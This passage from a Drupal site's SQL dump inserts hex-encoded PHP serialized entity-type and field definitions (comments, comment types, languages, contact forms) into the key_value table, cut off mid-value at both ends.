f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a22456e746974792074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a227265717569726564223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35303a2254686520656e74697479207479706520746f207768696368207468697320636f6d6d656e742069732061747461636865642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6d6d656e74223b733a31303a226669656c645f6e616d65223b733a31313a22656e746974795f74797065223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31373a226669656c645f6974656d3a737472696e67223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a33323b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3537353b7d733a373a22002a0074797065223b733a363a22737472696e67223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31303a226669656c645f6e616d65223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a22436f6d6d656e74206669656c64206e616d65223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a227265717569726564223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35323a22546865206669656c64206e616d65207468726f756768207768696368207468697320636f6d6d656e74207761732061646465642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a373a22636f6d6d656e74223b733a31303a226669656c645f6e616d65223b733a31303a226669656c645f6e616d65223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31373a226669656c645f6974656d3a737472696e67223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a33323b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3631303b7d733a373a22002a0074797065223b733a363a22737472696e67223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a33323b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31363a2264656661756c745f6c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a31303a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a2244656661756c74207472616e736c6174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35383a224120666c616720696e6469636174696e6720776865746865722074686973206973207468652064656661756c74207472616e736c6174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31323a227472616e736c617461626c65223b623a313b733a31323a227265766973696f6e61626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b623a313b7d7d733a383a2270726f7669646572223b733a373a22636f6d6d656e74223b733a31303a226669656c645f6e616d65223b733a31363a2264656661756c745f6c616e67636f6465223b733a31313a22656e746974795f74797065223b733a373a22636f6d6d656e74223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a626f6f6c65616e223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a323a224f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a226f66665f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a333a224f6666223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3634353b7d733a373a22002a0074797065223b733a373a22626f6f6c65616e223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a333a22696e74223b733a343a2273697a65223b733a343a2274696e79223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31323a22636f6d6d656e745f626f6479223b4f3a33383a2244727570616c5c6669656c645c456e746974795c4669656c6453746f72616765436f6e666967223a33303a7b733a31353a22002a00656e74697479547970654964223b733a32303a226669656c645f73746f726167655f636f6e666967223b733a31353a22002a00656e666f72636549734e6577223b623a313b733a31323a22002a00747970656444617461223b4e3b733a31363a22002a006361636865436f6e7465787473223b613a303a7b7d733a31323a22002a00636163686554616773223b613a303a7b7d733a31343a22002a0063616368654d6178416765223b693a2d313b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a31333a22002a006f726967696e616c4964223b733a32303a22636f6d6d656e742e636f6d6d656e745f626f6479223b733a393a22002a00737461747573223b623a313b733a373a22002a0075756964223b733a33363a2266336531313734352d363038612d346331632d396362312d326131613266353232316237223b733a31313a22002a006c616e67636f6465223b733a323a22656e223b733a32333a22002a0074686972645f70617274795f73657474696e6773223b613a303a7b7d733a383a22002a005f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a227377596f4363685f685938514f3575777234465552706c666e5543556c7050423469644638574756437077223b7d733a31343a22002a007472757374656444617461223b623a313b733a31353a22002a00646570656e64656e63696573223b613a313a7b733a363a226d6f64756c65223b613a323a7b693a303b733a373a22636f6d6d656e74223b693a313b733a343a2274657874223b7d7d733a31323a22002a00697353796e63696e67223b623a303b733a353a22002a006964223b733a32303a22636f6d6d656e742e636f6d6d656e745f626f6479223b733a31333a22002a006669656c645f6e616d65223b733a31323a22636f6d6d656e745f626f6479223b733a31343a22002a00656e746974795f74797065223b733a373a22636f6d6d656e74223b733a373a22002a0074797065223b733a393a22746578745f6c6f6e67223b733a393a22002a006d6f64756c65223b733a343a2274657874223b733a31313a22002a0073657474696e6773223b613a303a7b7d733a31343a22002a0063617264696e616c697479223b693a313b733a31353a22002a007472616e736c617461626c65223b623a313b733a393a22002a006c6f636b6564223b623a303b733a32353a22002a00706572736973745f776974685f6e6f5f6669656c6473223b623a313b733a31343a22637573746f6d5f73746f72616765223b623a303b733a31303a22002a00696e6465786573223b613a303a7b7d733a31303a22002a0064656c65746564223b623a303b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'comment_type.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31323a22636f6d6d656e745f74797065223b733a383a22002a00636c617373223b733a33333a2244727570616c5c636f6d6d656e745c456e746974795c436f6d6d656e7454797065223b733a31313a22002a0070726f7669646572223b733a373a22636f6d6d656e74223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a33333a2244727570616c5c636f6d6d656e745c456e746974795c436f6d6d656e7454797065223b733a31313a22002a0068616e646c657273223b613a353a7b733a343a22666f726d223b613a343a7b733a373a2264656661756c74223b733a33303a2244727570616c5c636f6d6d656e745c436f6d6d656e7454797065466f726d223b733a333a22616464223b733a33303a2244727570616c5c636f6d6d656e745c436f6d6d656e7454797065466f726d223b733a343a2265646974223b733a33303a2244727570616c5c636f6d6d656e745c436f6d6d656e7454797065466f726d223b733a363a2264656c657465223b733a34313a2244727570616c5c636f6d6d656e745c466f726d5c436f6d6d656e745479706544656c657465466f726d223b7d733a31343a22726f7574655f70726f7669646572223b613a313a7b733a31313a227065726d697373696f6e73223b733a35383a2244727570616c5c757365725c456e746974795c456e746974795065726d697373696f6e73526f75746550726f766964657257697468436865636b223b7d733a31323a226c6973745f6275696c646572223b733a33373a2244727570616c5c636f6d6d656e745c436f6d6d656e74547970654c6973744275696c646572223b733a363a22616363657373223b733a34353a2244727570616c5c436f72655c456e746974795c456e74697479416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6d6d656e74207479706573223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a353a7b733a31313a2264656c6574652d666f726d223b733a35333a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f64656c657465223b733a393a22656469742d666f726d223b733a34363a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d223b733a383a226164642d666f726d223b733a33343a222f61646d696e2f7374727563747572652f636f6d6d656e742f74797065732f616464223b733a32333a22656e746974792d7065726d697373696f6e732d666f726d223b733a35383a222f61646d696e2f7374727563747572652f636f6d6d656e742f6d616e6167652f7b636f6d6d656e745f747970657d2f7065726d697373696f6e73223b733a31303a22636f6c6c656374696f6e223b733a32343a222f61646d696e2f7374727563747572652f636f6d6d656e74223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b733a373a22636f6d6d656e74223b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22436f6d6d656e742074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b733a303a22223b733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22636f6d6d656e742074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22636f6d6d656e74207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31393a2240636f756e7420636f6d6d656e742074797065223b733a363a22706c7572616c223b733a32303a2240636f756e7420636f6d6d656e74207479706573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32343a22636f6e6669673a636f6d6d656e745f747970655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a343a2274797065223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a343a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a32313a227461726765745f656e746974795f747970655f6964223b693a333b733a31313a226465736372697074696f6e223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'configurable_language.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a31363a22002a00636f6e6669675f707265666978223b733a363a22656e74697479223b733a31353a22002a007374617469635f6361636865223b623a303b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a353a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a393a22646972656374696f6e223b693a333b733a363a22776569676874223b693a343b733a363a226c6f636b6564223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a363a22776569676874223b733a363a22776569676874223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a353a22002a006964223b733a32313a22636f6e666967757261626c655f6c616e6775616765223b733a31363a22002a006f726967696e616c436c617373223b733a34333a2244727570616c5c6c616e67756167655c456e746974795c436f6e666967757261626c654c616e6775616765223b733a31313a22002a0068616e646c657273223b613a343a7b733a31323a226c6973745f6275696c646572223b733a33353a2244727570616c5c6c616e67756167655c4c616e67756167654c6973744275696c646572223b733a363a22616363657373223b733a34343a2244727570616c5c6c616e67756167655c4c616e6775616765416363657373436f6e74726f6c48616e646c6572223b733a343a22666f726d223b613a333a7b733a333a22616464223b733a33363a2244727570616c5c6c616e67756167655c466f726d5c4c616e6775616765416464466f726d223b733a343a2265646974223b733a33373a2244727570616c5c6c616e67756167655c466f726d5c4c616e677561676545646974466f726d223b733a363a2264656c657465223b733a33393a2244727570616c5c6c616e67756167655c466f726d5c4c616e677561676544656c657465466f726d223b7d733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32303a2261646d696e6973746572206c616e677561676573223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a333a7b733a31313a2264656c6574652d666f726d223b733a36323a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f64656c6574652f7b636f6e666967757261626c655f6c616e67756167657d223b733a393a22656469742d666f726d223b733a36303a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e67756167652f656469742f7b636f6e666967757261626c655f6c616e67756167657d223b733a31303a22636f6c6c656374696f6e223b733a33313a222f61646d696e2f636f6e6669672f726567696f6e616c2f6c616e6775616765223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a224c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a224c616e677561676573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a226c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a226c616e677561676573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31353a2240636f756e74206c616e6775616765223b733a363a22706c7572616c223b733a31363a2240636f756e74206c616e677561676573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a33333a22636f6e6669673a636f6e666967757261626c655f6c616e67756167655f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a313a7b733a31303a22746f6b656e5f74797065223b733a32313a22636f6e666967757261626c655f6c616e6775616765223b7d733a383a22002a00636c617373223b733a34333a2244727570616c5c6c616e67756167655c456e746974795c436f6e666967757261626c654c616e6775616765223b733a31313a22002a0070726f7669646572223b733a383a226c616e6775616765223b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b7d),
('entity.definitions.installed', 'contact_form.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31323a22636f6e746163745f666f726d223b733a383a22002a00636c617373223b733a33333a2244727570616c5c636f6e746163745c456e746974795c436f6e74616374466f726d223b733a31313a22002a0070726f7669646572223b733a373a22636f6e74616374223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a33333a2244727570616c5c636f6e746163745c456e746974795c436f6e74616374466f726d223b733a31313a22002a0068616e646c657273223b613a353a7b733a363a22616363657373223b733a34363a2244727570616c5c636f6e746163745c436f6e74616374466f726d416363657373436f6e74726f6c48616e646c6572223b733a31323a226c6973745f6275696c646572223b733a33373a2244727570616c5c636f6e746163745c436f6e74616374466f726d4c6973744275696c646572223b733a343a22666f726d223b613a333a7b733a333a22616464223b733a33343a2244727570616c5c636f6e746163745c436f6e74616374466f726d45646974466f726d223b733a343a2265646974223b733a33343a2244727570616c5c636f6e746163745c436f6e74616374466f726d45646974466f726d223b733a363a2264656c657465223b733a33353a2244727570616c5c436f72655c456e746974795c456e7469747944656c657465466f726d223b7d733a31343a22726f7574655f70726f7669646572223b613a313a7b733a31313a227065726d697373696f6e73223b733a35383a2244727570616c5c757365725c456e746974795c456e746974795065726d697373696f6e73526f75746550726f766964657257697468436865636b223b7d733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32343a2261646d696e697374657220636f6e7461637420666f726d73223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a353a7b733a31313a2264656c6574652d666f726d223b733a35333a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f64656c657465223b733a393a22656469742d666f726d223b733a34363a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d223b733a32333a22656e746974792d7065726d697373696f6e732d666f726d223b733a35383a222f61646d696e2f7374727563747572652f636f6e746163742f6d616e6167652f7b636f6e746163745f666f726d7d2f7065726d697373696f6e73223b733a31303a22636f6c6c656374696f6e223b733a32343a222f61646d696e2f7374727563747572652f636f6e74616374223b733a393a2263616e6f6e6963616c223b733a32333a222f636f6e746163742f7b636f6e746163745f666f726d7d223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b733a31353a22636f6e746163745f6d657373616765223b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22436f6e7461637420666f726d223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e7461637420666f726d73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22636f6e7461637420666f726d223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22636f6e7461637420666f726d73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31393a2240636f756e7420636f6e7461637420666f726d223b733a363a22706c7572616c223b733a32303a2240636f756e7420636f6e7461637420666f726d73223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a32343a22636f6e6669673a636f6e746163745f666f726d5f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002